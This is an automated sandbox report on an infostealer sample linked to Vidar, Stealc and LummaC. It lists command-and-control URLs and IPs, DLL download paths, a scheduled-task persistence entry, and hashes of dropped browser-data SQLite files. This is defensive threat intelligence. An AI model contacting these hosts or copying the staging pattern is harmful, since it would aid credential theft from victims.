http://arpdabl.zapto.org/	Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://store.steampowered.com/stats/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://195.201.118.191/freebl3.dllxh	Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	EHJDGC.18.dr	false	URL Reputation: safe	unknown
http://arpdabl.zapto.org/1Gp	Predicted.pif, 00000012.00000002.4066261893.000000000178A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	CBGCAF.18.dr	false	URL Reputation: safe	unknown
https://195.201.118.191/sqlr.dllfh	Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/privacy_agreemen	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/legal/	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont	Predicted.pif, 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066469500.0000000001878000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	Predicted.pif, 00000012.00000002.4074056045.000000000CC0D000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://195.201.118.191/freebl3.dllNh	Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://arpdabl.zapto.org/5S	Predicted.pif, 00000012.00000002.4066469500.000000000189E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	Predicted.pif, 00000012.00000002.4068055987.00000000049D8000.00000040.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, 76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199751190313[1].htm.18.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Predicted.pif, 00000012.00000002.4067199541.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4067119650.0000000001A4C000.00000004.00000800.00020000.00000000.sdmp, HDAAAA.18.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.201.118.191	unknown	Germany	24940	HETZNER-ASDE	true
23.210.122.61	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1494714
Start date and time:	2024-08-19 06:02:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@33/45@3/3
EGA Information:	Successful, ratio: 40%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 7528 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7548 because there are no executed function
Execution Graph export aborted for target file.exe, PID 7344 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:04:00	API Interceptor	5311422x Sleep call for process: axplong.exe modified
00:04:04	API Interceptor	1x Sleep call for process: seo.exe modified
00:04:44	API Interceptor	2350x Sleep call for process: Predicted.pif modified
05:02:57	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
195.201.118.191	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse
	dXaIbmbdKj.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	inte.exe	Get hash	malicious	GCleaner, Vidar	Browse
23.210.122.61	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	Wpzyo4HhR7.exe	Get hash	malicious	LummaC	Browse
	JZ9FCJzkXL.exe	Get hash	malicious	LummaC, CryptOne	Browse
	Wpzyo4HhR7.exe	Get hash	malicious	LummaC	Browse
	gunElxa5ZA.exe	Get hash	malicious	Vidar	Browse
	elton.exe	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer, PureLog Stealer	Browse
	fKYrTm48vZ.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse
	https://steamcomunmnity.com/app/1648293/STALKER_2_Heart_of_Chornobyl	Get hash	malicious	Unknown	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	https://steamfiller.ru/	Get hash	malicious	Unknown	Browse
185.215.113.16	SecuriteInfo.com.Win32.Evo-gen.17159.9660.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/num/random.exe
	SecuriteInfo.com.Win32.Evo-gen.11322.22832.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16/num/random.exe
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/num/random.exe
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.215.113.16/inc/1111.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.215.113.16/soka/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.210.122.61
	crt.exe	Get hash	malicious	Socks5Systemz	Browse	23.192.247.89
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.192.247.89
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	66bfee9fd7d9a_lumma.exe	Get hash	malicious	LummaC	Browse	23.199.218.33
	SecuriteInfo.com.Trojan.InjectNET.17.22691.19885.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	23.199.218.33
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	23.197.127.21
	O6qi7Kconr.exe	Get hash	malicious	LummaC, Go Injector	Browse	23.192.247.89
	xKCGmDmnB1.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
arpdabl.zapto.org	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	0.0.0.0
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	0.0.0.0
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse	0.0.0.0
	dXaIbmbdKj.exe	Get hash	malicious	Vidar	Browse	0.0.0.0
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	0.0.0.0
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	0.0.0.0
	file.exe	Get hash	malicious	Vidar	Browse	0.0.0.0
	inte.exe	Get hash	malicious	GCleaner, Vidar	Browse	0.0.0.0
	66b9d00589bbc_doz.exe	Get hash	malicious	Vidar	Browse	38.180.132.96
	66b9d56da3bee_main.exe	Get hash	malicious	Vidar	Browse	38.180.132.96

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	195.201.118.191
	https://dan4-rz.com-id.shop/	Get hash	malicious	Unknown	Browse	135.181.63.70
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	195.201.118.191
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse	195.201.118.191
	http://vbfii.pgslotmx.com/4lErLl15833GMQN1411zilkbmrmpx14462UVBCFIXAXTJVAYQ286RNBY17492g17	Get hash	malicious	Unknown	Browse	168.119.146.39
	dXaIbmbdKj.exe	Get hash	malicious	Vidar	Browse	195.201.118.191
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	195.201.118.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	195.201.118.191
	file.exe	Get hash	malicious	Vidar	Browse	195.201.118.191
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	135.181.16.82
AKAMAI-ASUS	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.210.122.61
	https://gtm.you1.cn/id/N_E_L_L	Get hash	malicious	Unknown	Browse	2.16.202.91
	crt.exe	Get hash	malicious	Socks5Systemz	Browse	23.192.247.89
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.192.247.89
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	66bfee9fd7d9a_lumma.exe	Get hash	malicious	LummaC	Browse	23.199.218.33
	SecuriteInfo.com.Trojan.InjectNET.17.22691.19885.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	23.199.218.33
	O6qi7Kconr.exe	Get hash	malicious	LummaC, Go Injector	Browse	23.192.247.89
	xKCGmDmnB1.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	rama.exe	Get hash	malicious	Amadey, Babadeda, Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	SecuriteInfo.com.Win32.Evo-gen.17159.9660.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	SecuriteInfo.com.Win32.Evo-gen.11322.22832.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	195.201.118.191
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	195.201.118.191
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse	195.201.118.191
	dXaIbmbdKj.exe	Get hash	malicious	Vidar	Browse	195.201.118.191
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	195.201.118.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	195.201.118.191
	file.exe	Get hash	malicious	Vidar	Browse	195.201.118.191
	inte.exe	Get hash	malicious	GCleaner, Vidar	Browse	195.201.118.191
	66b9d00589bbc_doz.exe	Get hash	malicious	Vidar	Browse	195.201.118.191
	66b9d56da3bee_main.exe	Get hash	malicious	Vidar	Browse	195.201.118.191
37f463bf4616ecd445d4a1937da06e19	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.210.122.61
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.210.122.61
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse	23.210.122.61
	xKCGmDmnB1.exe	Get hash	malicious	LummaC	Browse	23.210.122.61
	tEKt7miZ2i.exe	Get hash	malicious	LummaC	Browse	23.210.122.61
	razspy.bin.exe	Get hash	malicious	Unknown	Browse	23.210.122.61
	razspy.bin.exe	Get hash	malicious	Unknown	Browse	23.210.122.61
	PI_PA0092000121.docx.doc	Get hash	malicious	Unknown	Browse	23.210.122.61
	Order_ 039924.docx.doc	Get hash	malicious	Unknown	Browse	23.210.122.61
	SecuriteInfo.com.Win32.DropperX-gen.16703.29630.exe	Get hash	malicious	LummaC	Browse	23.210.122.61

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\EBGCFBGCBFHJ\JKJDBA	lem.exe	Get hash	malicious	Vidar	Browse
	ljwIPDSwFi.exe	Get hash	malicious	DarkGate, MailPassView, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	5CG2133F5Y_2024-04-05_12_15_35.569.zip	Get hash	malicious	Unknown	Browse
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.BootkitX-gen.24236.15066.exe	Get hash	malicious	Stealc, Vidar	Browse
	66bddfc358668_stealc.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	66bddfcb52736_vidar.exe	Get hash	malicious	LummaC, Vidar	Browse
	Hf4FkSWycv.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\EBGCFBGCBFHJ\AEHIDA

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\CBGCAF

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\CBKJJE

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\CFHIIE

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\CFHIIE-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\CFIIIJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\DBKKFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\DBKKFC-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\DGIJEG

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10219
Entropy (8bit):	4.966520026409024
Encrypted:	false
SSDEEP:	96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
MD5:	381138FA1B1C4C298AD2441898677ED6
SHA1:	B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
